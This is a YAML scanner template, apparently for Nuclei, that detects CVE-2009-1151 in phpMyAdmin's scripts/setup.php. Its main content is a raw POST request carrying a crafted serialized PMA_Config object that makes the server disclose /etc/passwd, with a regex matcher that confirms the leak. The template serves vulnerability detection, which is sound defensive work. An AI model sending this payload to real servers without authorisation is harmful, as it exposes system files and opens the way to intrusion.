37 lines
1.3 KiB
YAML
37 lines
1.3 KiB
YAML
id: CVE-2009-1151
|
|
|
|
info:
|
|
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
|
author: princechaddha
|
|
severity: high
|
|
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
|
reference:
|
|
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
|
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
|
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
|
|
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
|
|
classification:
|
|
cve-id: CVE-2009-1151
|
|
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /scripts/setup.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip, deflate
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|